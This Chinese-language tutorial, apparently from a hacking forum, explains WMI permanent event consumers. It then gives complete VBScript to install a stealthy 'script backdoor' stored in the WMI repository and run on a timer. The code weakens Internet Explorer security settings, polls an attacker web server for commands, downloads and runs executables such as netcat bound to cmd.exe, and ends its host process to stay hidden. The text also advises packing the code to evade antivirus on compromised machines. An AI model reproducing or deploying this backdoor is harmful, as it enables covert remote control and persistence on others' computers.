在讨论脚本后门前,先要介绍一类很有用的WMI对象。事实上,这才是本节的关键。脚本后门不过是它的一个应用而已。
前面已经说过,WMI是事件驱动的。整个事件处理机制分为四个部分:
1,事件生产者(provider):负责产生事件。WMI包含大量的事件生产者。有性能计数器之类的具体的事件生产者,也有类、实例的创建、修改、删除等通用的事件生产者。
2,事件过滤器(filter):系统每时每刻都在产生大量的事件,通过自定义过滤器,脚本可以捕获感兴趣的事件进行处理。
3,事件消费者(consumer):负责处理事件。它可以是可执行程序、动态链接库(dll,由WMI服务加载)或者脚本。
4,事件绑定(binding):通过将过滤器和消费者绑定,明确什么事件由什么消费者负责处理。
事件消费者可以分为临时的和永久的两类。临时的事件消费者只在其运行期间关心特定事件并处理。永久消费者作为类的实例注册在WMI名字空间中,一直有效直到它被注销。显然,永久事件消费者更具实用性。还是来看个例子:
nslink=\”winmgmts:\\\\.\\root\\cimv2:\” \’只需要本地连接,所以用这种语法,不用swbemlocator对象\’
set asec=getobject(nslink&\”ActiveScriptEventConsumer\”).spawninstance_ \’创建“活动脚本事件消费者”\’
asec.name=\”stopped_spooler_restart_consumer\” \’定义消费者的名字\’
asec.scriptingengine=\”vbscript\” \’定义脚本语言(只能是vbscript)\’
asec.scripttext=\”getobject(\”\”winmgmts:win32_service=\’spooler\’\”\”).startservice\” \’脚本代码\’
set asecpath=asec.put_ \’注册消费者,返回其链接\’
set evtflt=getobject(nslink&\”__EventFilter\”).spawninstance_ \’创建事件过滤器\’
evtflt.name=\”stopped_spooler_filter\” \’定义过滤器的名字\’
qstr=\”select * from __instancemodificationevent within 5 \” \’每5秒查询一次“实例修改事件”\’
qstr=qstr&\”where targetinstance isa \”\”win32_service\”\” and \” \’目标实例的类是win32_service\’
qstr=qstr&\”targetinstance.name=\”\”spooler\”\” \” \’实例名是spooler\’
qstr=qstr&\”and targetinstance.state=\”\”stopped\”\”\” \’实例的state属性是stopped\’
evtflt.query=qstr \’定义查询语句\’
evtflt.querylanguage=\”wql\” \’定义查询语言(只能是wql)\’
set fltpath=evtflt.put_ \’注册过滤器,返回其链接\’
set fcbnd=getobject(nslink&\”__FilterToConsumerBinding\”).spawninstance_ \’创建过滤器和消费者的绑定\’
fcbnd.consumer=asecpath.path \’指定消费者\’
fcbnd.filter=fltpath.path \’指定过滤器\’
fcbnd.put_ \’执行绑定\’
wscript.echo \”安装完成\”
这个脚本的效果是:当“后台打印”服务(spooler)状态改变为停止时,消费者将进行处理——重启spooler。
先net start spooler,然后net stop spooler。最多5秒钟,spooler又会启动。
直接运行上面的脚本会出错,因为“活动脚本事件消费者”(ActiveScriptEventConsumer ASEC)默认没有被安装到root\\cimv2名字空间。
用记事本打开%windir%\\system32\\wbem\\scrcons.mof,将第一行“#pragma namespace (\”\\\\\\\\.\\\\Root\\\\Default\”)”删除,或者修改为“#pragma namespace (\”\\\\\\\\.\\\\Root\\\\cimv2\”)”。XP/2003没有这一行,不用修改。
然后执行下面这个命令:
C:\\WINNT\\system32\\wbem>mofcomp.exe -N:root\\cimv2 scrcons.mof
Microsoft (R) 32-bit MOF 汇编器版本 1.50.1085.0007
版权所有 (c) Microsoft Corp. 1997-1999。保留所有权利。
正在分析 MOF 文件: scrcons.mof
MOF 文件分析成功
将数据储存到储备库中…
已完成!
这样就把ASEC安装到root\\cimv2了。mofcomp.exe和scrcons.mof都是系统自带的。
2000默认将ASEC安装到root\\default名字空间,而XP/2003默认已经安装到root\\subscription名字空间,但由于事件过滤器不能跨名字空间捕捉事件(XP/2003可以),事件绑定也不能跨名字空间,而大部分事件都在root\\cimv2产生,所以需要重新安装ASEC到事件源所在的名字空间。下面这个脚本自动完成ASEC重安装任务。
set shl=createobject(\”WScript.Shell\”)
set fso=createobject(\”Scripting.FileSystemObject\”)
path=shl.expandenvironmentstrings(\”%windir%\\system32\\wbem\\\”)
set mof=fso.opentextfile(path&\”scrcons.mof\”,1,false,-1) \’mof都是Unicode格式的\’
mofs=mof.readall
mof.close
mofs=replace(mofs,\”\\\\Default\”,\”\\\\cimv2\”,1,1) \’替换默认的名字空间\’
mofp=path&\”asecimv2.mof\”
set mof=fso.createtextfile(mofp,false,true) \’创建临时mof文件\’
mof.write mofs
mof.close
shl.run path&\”mofcomp.exe -N:root\\cimv2 \”&mofp,0,true \’安装到root\\cimv2\’
fso.deletefile(mofp)
wscript.echo \”安装完成\”
注销永久事件:
nslink=\”winmgmts:\\\\.\\root\\cimv2:\”
myconsumer=\”stopped_spooler_restart_consumer\” \’指定消费者的名字\’
myfilter=\”stopped_spooler_filter\” \’指定过滤器的名字\’
set binds=getobject(nslink&\”__FilterToConsumerBinding\”).instances_
for each bind in binds
if strcomp(right(bind.consumer,len(myconsumer)+1),myconsumer&chr(34),1)=0 _
and strcomp(right(bind.filter,len(myfilter)+1),myfilter&chr(34),1)=0 then
getobject(\”winmgmts:\”&bind.consumer).delete_ \’删除消费者\’
getobject(\”winmgmts:\”&bind.filter).delete_ \’删除过滤器\’
bind.delete_ \’删除绑定\’
exit for
end if
next
wscript.echo \”卸载完成\”
除了ASEC,WMI还提供其他永久事件消费者,比如SMTPEventConsumer。当系统出现异常时,可以通过它自动给管理员的信箱发信。WMITools里的WMI Event Registration用于创建、修改、删除指定名字空间里的永久事件消费者、事件过滤器和计时器事件源的实例,以及绑定或解除绑定它们。
[NextPage]
关于事件处理机制的各个部分,在《WMI技术指南》里有详细的讲述,MSDN里当然更全面。我就点到为止了。
(看累了吧,喝口水,休息一下 ^_^)
下面开始讨论脚本后门。
WMI提供了两个计时器:__AbsoluteTimerInstruction和__IntervalTimerInstruction,分别在指定的时刻和时间间隔触发事件,注册一个过滤器来捕获计时器事件,再和ASEC绑定,我们就获得了一种少见的程序自启动的方法。而且,脚本代码完全隐藏在CIM存储库中,不以独立的文件存在,查杀比较困难。这是脚本后门的优势,但困难也不少:
1,脚本运行时,由系统自带的scrcons.exe作为脚本宿主(Windows的设计者还没有笨到用WMI服务作为脚本宿主)。这就会增加一个进程,虽然是系统正常的进程,杀毒软件拿它没辙,但还是太显眼了。所以,不能让脚本一直在后台运行,而是应该每隔一段时间启动一次,然后尽快结束。脚本结束后,scrcons.exe进程不会自动结束,必须让脚本借助WMI提供的Win32_Process对象主动终止宿主进程(煮豆燃豆萁?!)。
2,脚本的网络功能很差,基本上只能依靠Microsoft.XMLHTTP之类的对象。因此,脚本后门不能监听端口并提供cmd shell,只能反向连接到web服务器,获取控制命令。一个可行的办法是,在web服务器上放一个命令文件,脚本后门根据域名找到服务器并下载命令文件,再根据文件内容作出响应。所以,你需要一台web服务器,或者用netbox等工具建个临时服务器。当然,你不需要让服务器总是在线,需要控制脚本后门时再运行就可以了。
3,由于脚本后门间歇式运行,需要防止重复运行同一个命令。解决方法是在注册表里记录命令的长度,每次获取命令后将长度和记录做比较,如果相同则跳过,不同则覆盖并执行命令。
4,为了借助ie对象穿透防火墙,XMLHTTP对象必须在ie中被创建,这会受到Internet域安全级别的限制。即使将代码保存在html文件中再用ie打开,也不过是“我的电脑”域,创建不安全的ActiveX对象还是会弹出警告对话框。解决办法是修改注册表,临时更改安全设置。
5,WScript对象由wscript.exe或cscript.exe提供,而scrcons.exe没有提供,所以很多常用的功能,比如WScript.Sleep都不能用了。不能Sleep就无法异步使用XMLHTTP,而同步XMLHTTP可能被长时间阻塞,大大不利于后门的隐蔽。调用ping命令来延时会创建新进程,用WScript.Shell的Popup方法延时则有“咚”一声提示音。好在Microsoft.XMLHTTP的“亲戚”不少,比如Msxml2.XMLHTTP、Msxml2.ServerXMLHTTP、Msxml2.DOMDocument、WinHttp.WinHttpRequest等。最后那个可以设置超时时间,刚好满足需要。
即使有重重困难,脚本后门仍然值得挑战一下。当肉鸡上的各类木马纷纷被杀毒软件肃清后,一个24小时才运行一次的脚本后门可能是你最后的希望。
下面是一个简单的脚本后门的核心代码(没有安装功能):
cmdu=\”http://myweb.8866.org/cmd.txt\” \’从web服务器获取命令的url\’
cmdw=4000 \’下载超时时间4秒\’
cmdl=\”HKLM\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\CmdLength\” \’记录命令长度的键值名\’
on error resume next \’忽略非致命错误 \’(调试时注释掉本行)
set shl=createobject(\”WScript.Shell\”) \’虽然不能使用WScript根对象,其子对象还是可以用的\’
set aso=createobject(\”ADODB.Stream\”)
set ie=createobject(\”InternetExplorer.Application\”) \’使用ie绕过防火墙\’
zone=\”HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\”
set1=zone&\”\\1201\”
set2=zone&\”\\1400\”
set3=zone&\”\\CurrentLevel\”
val1=shl.regread(set1) \’保存原来的安全设置\’
val2=shl.regread(set2)
val3=shl.regread(set3)
regd=\”REG_DWORD\”
shl.regwrite set1,0,regd \’允许在Internet域运行不安全的ActiveX\’
shl.regwrite set2,0,regd \’允许活动脚本\’
shl.regwrite set3,0,regd \’设置当前Internet域安全级别为“自定义”\’
ie.visible=0 \’:ie.visible=1 \’(调试用)
ie.navigate \”about\”&\”:blank\” \’这里使用字符串连接纯属反论坛过滤\’
ie.document.write _
\”<script>function whr(){return new ActiveXObject(\’WinHttp.WinHttpRequest.5.1\’)}</script>\”
set whr=ie.document.script.whr() \’在ie内创建WinHttpRequest对象\’
whr.settimeouts cmdw,cmdw,cmdw,cmdw \’设置域名解析、连接、发送和接收超时时间\’
whr.open \”GET\”,cmdu,true \’获取命令文件\’
whr.send
if not whr.waitforresponse(cmdw) then die
if whr.status>299 then die
rt=whr.responsetext \’:wscript.echo rt \’(调试用)
\’:shl.regwrite cmdl,0,regd \’(调试用)
if len(rt)=shl.regread(cmdl) then die \’与前一个命令的长度比较\’
shl.regwrite cmdl,len(rt),regd \’更新命令长度\’
cmds=split(rt,vbcrlf,-1)
if ubound(cmds)<1 then die
cmdt=lcase(trim(cmds(0))) \’:wscript.echo cmdt \’(调试用)
aso.type=1
aso.open
cd=shl.currentdirectory&chr(92)
select case cmdt \’分析命令文件类型\’
case \”\’vbs\” \’是vbs\’
execute(rt) \’直接在当前脚本上下文中执行\’
die
case \”:bat\” \’是批处理\’
aso.write whr.responsebody
aso.savetofile cd&\”_.bat\”,2 \’保存在当前目录\’
aso.close
shl.run chr(34)&cd&\”_.bat\”\”\”,0 \’运行批处理\’
die
case \”\’wsh\” \’是Windows脚本\’
aso.write whr.responsebody
aso.savetofile cd&\”_.vbs\”,2 \’保存在当前目录\’
[NextPage]
aso.close
shl.run \”cscript.exe \”\”\”&cd&\”_.vbs\”\”\”,0 \’使用cscript作为脚本宿主\’
die
case \”exe\” \’exe需进一步分析\’
case else die
end select
if ubound(cmds)<4 then die \’:wscript.echo cmds(1) \’(调试用)
whr.open \”GET\”,cmds(1),true \’从指定位置下载exe文件\’
whr.send
if not whr.waitforresponse(cmds(2)) then die
if whr.status>299 then die
path=shl.expandenvironmentstrings(cmds(3))\’展开保存路径中的环境变量\’
aso.write whr.responsebody \’:wscript.echo path \’(调试用)
aso.savetofile path,2 \’保存exe文件\’
aso.close
shl.run chr(34)&path&\”\”\” \”&cmds(4),0 \’执行exe\’
die
sub die
ie.quit
shl.regwrite set1,val1,regd \’还原Internet域安全设置\’
shl.regwrite set2,val2,regd
shl.regwrite set3,val3,regd
for each ps in getobject(\”winmgmts:\\\\.\\root\\cimv2:win32_process\”).instances_
if lcase(ps.name)=\”scrcons.exe\” then ps.terminate \’自杀\’
next
\’wscript.echo \”die\”: wscript.quit \’(调试用)
end sub
取消调试语句的注释,上面这段核心代码就可以直接运行。
它将试图从myweb.8866.org上获取cmd.txt,根据里面的内容进一步行动。
cmd.txt看起来像这样:
exe //被执行的文件类型,可以是\’vbs、:bat、exe或\’wsh
http://myweb.8866.org/nc.exe //被执行的文件的下载url
4000 //下载超时时间,单位毫秒
%windir%\\system32\\nc.exe //文件的保存位置,支持环境变量
-L -p 1234 -e cmd.exe //命令行参数
收到上面这个命令后,脚本将从指定url下载nc.exe,保存到系统目录并运行。
如果第一行的文件类型为\’vbs、\’wsh或:bat,则把命令文件本身当作脚本或批处理来执行。比如:
:bat
net start telnet :启动telnet服务
del %0 :自删除
如果只是想让某台主机执行命令,可以这样:
:bat
ipconfig | find \”123.45.67.89\” && net start telnet
del %0
这样就只有ip地址为123.45.67.89的主机才会启动telnet。
\’wsh和\’vbs的区别是,前者保存为文件由cscript.exe调用,后者直接在脚本后门“内部”执行。
使用\’vbs的好处是不用生成文件,而且可以直接利用后门中已经创建的对象,比如shl,但也因此不能用WScript根对象。
下面的\’vbs命令文件把\”本地帐户的共享和安全模式\”由\”仅来宾\”改为\”经典\”(对XP和2003有效):
\’vbs
shl.regwrite \”HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\forceguest\”,0,\”REG_DWORD\”
注意,vbs和wsh前面都有一个单引号,因为整个命令文件都作为脚本执行,所以必须注释掉第一行,:bat也是一样。
使用\’vbs时千万注意不要有语法错误,否则会使后门出错并停止。如果是复杂的脚本,建议使用\’wsh。
将核心代码改写为单行字符串格式,就可以作为ASEC的实例安装了。改写时要注意\”if\”和\”end if\”配对以及去掉续行符。
完整的安装脚本代码如下:
\’***以下为参数配置,请根据情况自行修改***\’
nslink=\”winmgmts:\\\\.\\root\\cimv2:\” \’ASEC所在的名字空间\’
doorname=\”vbscript_backdoor\” \’记住后门的名字,卸载时需要\’
runinterval=86400000 \’每天运行一次\’
cmdu=\”http://myweb.8866.org/cmd.txt\” \’命令文件的位置\’
cmdw=4000 \’文件下载超时时间\’
cmdl=\”HKLM\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\CmdLength\” \’保存命令长度的键值名\’
\’***参数配置结束***\’
createobject(\”WScript.Shell\”).regwrite cmdl,0,\”REG_DWORD\”
\’脚本后门核心代码\’
stxt=\”cmdu=\”\”\”&cmdu&\”\”\”:cmdw=\”&cmdw&\”:cmdl=\”\”\”&cmdl&\”\”\”:on error resume next:set shl=createobject(\”\”WScript.Shell\”\”):set aso=createobject(\”\”ADODB.Stream\”\”):set ie=createobject(\”\”InternetExplorer.Application\”\”):zone=\”\”HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\”\”:set1=zone&\”\”\\1201\”\”:set2=zone&\”\”\\1400\”\”:set3=zone&\”\”\\CurrentLevel\”\”:val1=shl.regread(set1):val2=shl.regread(set2):val3=shl.regread(set3):regd=\”\”REG_DWORD\”\”:shl.regwrite set1,0,regd:shl.regwrite set2,0,regd:shl.regwrite set3,0,regd:ie.visible=0:ie.navigate \”\”about\”\”&\”\”:blank\”\”:ie.document.write \”\”<script>function whr(){return new ActiveXObject(\’WinHttp.WinHttpRequest.5.1\’)}</script>\”\”:with ie.document.script.whr():.settimeouts cmdw,cmdw,cmdw,cmdw:.open \”\”GET\”\”,cmdu,true:.send:if not .waitforresponse(cmdw) then die:end if:if .status>299 then die:end if:rt=.responsetext:if len(rt)=shl.regread(cmdl) then die:end if:shl.regwrite cmdl,len(rt),regd:cmds=split(rt,vbcrlf,-1):if ubound(cmds)<1 then die:end if:cmdt=lcase(trim(cmds(0))):aso.type=1:aso.open:cd=shl.currentdirectory&chr(92):select case cmdt:case \”\”\’vbs\”\”:execute(rt):die:case \”\”:bat\”\”:aso.write .responsebody:aso.savetofile cd&\”\”_.bat\”\”,2:aso.close:shl.run chr(34)&cd&\”\”_.bat\”\”\”\”\”\”,0:die:case \”\”\’wsh\”\”:aso.write .responsebody:aso.savetofile cd&\”\”_.vbs\”\”,2:aso.close:shl.run \”\”cscript.exe \”\”\”\”\”\”&cd&\”\”_.vbs\”\”\”\”\”\”,0:die:case \”\”exe\”\”:case else die:end select:if ubound(cmds)<4 then die:end if:.open \”\”GET\”\”,cmds(1),true:.send:if not .waitforresponse(cmds(2)) then die:end if:if .status>299 then die:end if:path=shl.expandenvironmentstrings(cmds(3)):aso.write .responsebody:aso.savetofile path,2:aso.close:shl.run chr(34)&path&\”\”\”\”\”\” \”\”&cmds(4),0:end with:die:sub die:ie.quit:shl.regwrite set1,val1,regd:shl.regwrite set2,val2,regd:shl.regwrite set3,val3,regd:for each ps in getobject(\”\”winmgmts:\\\\.\\root\\cimv2:win32_process\”\”).instances_:if lcase(ps.name)=\”\”scrcons.exe\”\” then ps.terminate:end if:next:end sub\”
[NextPage]
\’配置事件消费者\’
set asec=getobject(nslink&\”ActiveScriptEventConsumer\”).spawninstance_
asec.name=doorname&\”_consumer\”
asec.scriptingengine=\”vbscript\”
asec.scripttext=stxt
set asecpath=asec.put_
\’配置计时器\’
set itimer=getobject(nslink&\”__IntervalTimerInstruction\”).spawninstance_
itimer.timerid=doorname&\”_itimer\”
itimer.intervalbetweenevents=runinterval
itimer.skipifpassed=false
itimer.put_
\’配置事件过滤器\’
set evtflt=getobject(nslink&\”__EventFilter\”).spawninstance_
evtflt.name=doorname&\”_filter\”
evtflt.query=\”select * from __timerevent where timerid=\”\”\”&doorname&\”_itimer\”\”\”
evtflt.querylanguage=\”wql\”
set fltpath=evtflt.put_
\’绑定消费者和过滤器\’
set fcbnd=getobject(nslink&\”__FilterToConsumerBinding\”).spawninstance_
fcbnd.consumer=asecpath.path
fcbnd.filter=fltpath.path
fcbnd.put_
wscript.echo \”安装完成\”
与前一个永久事件处理过程不同的是,脚本后门的事件源是计时器,在每个名字空间都可以实例化并触发事件。所以,不一定要将ASEC安装到root\\cimv2。特别是XP/2003,ASEC默认已经安装到root\\subscription,只需要相应修改nslink的值,就可以安装脚本后门了。
卸载脚本后门:
cmdl=\”HKLM\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\CmdLength\”
createobject(\”WScript.Shell\”).regdelete cmdl \’删除保存命令长度的键值\’
nslink=\”winmgmts:\\\\.\\root\\cimv2:\”
doorname=\”vbscript_backdoor\” \’根据脚本后门的名字找到各个对象实例\’
myconsumer=doorname&\”_consumer\”
mytimer=doorname&\”_itimer\”
myfilter=doorname&\”_filter\”
set binds=getobject(nslink&\”__FilterToConsumerBinding\”).instances_
for each bind in binds
if strcomp(right(bind.consumer,len(myconsumer)+1),myconsumer&chr(34),1)=0 _
and strcomp(right(bind.filter,len(myfilter)+1),myfilter&chr(34),1)=0 then
bind.delete_
exit for
end if
next
getobject(nslink&\”ActiveScriptEventConsumer.Name=\”\”\”&myconsumer&\”\”\”\”).delete_
getobject(nslink&\”__IntervalTimerInstruction.TimerId=\”\”\”&mytimer&\”\”\”\”).delete_
getobject(nslink&\”__EventFilter.Name=\”\”\”&myfilter&\”\”\”\”).delete_
wscript.echo \”卸载完成\”
几点补充说明:
1,脚本后门的优势在于隐蔽,所以24小时才运行一次是合适的。不用担心因为系统关机而错过运行机会,下次启动时会补上的。
2,为了更好的反查杀,可以给脚本后门的核心代码加壳。在功能上也可以改进到接近IRC木马的程度,只不过服务端是Web服务器,不能同时养太多的马。
3,脚本后门的自启动和运行依赖于WMI服务,虽然禁用WMI服务就可以杜绝此类后门和木马,但比起通过注册表启动还是可靠的多。如果被蠕虫病毒利用,恐怕会很麻烦吧。
结语
Windows脚本就像万能胶,能够把独立的程序、服务、控件组合起来完成任务。脚本编程的技巧就是组合的技巧。XP和2003比2000自带更多的命令行工具,WMI也大大加强了,脚本的功能水涨船高,可以说是“只有想不到,没有做不到”。一切有待你的发掘。
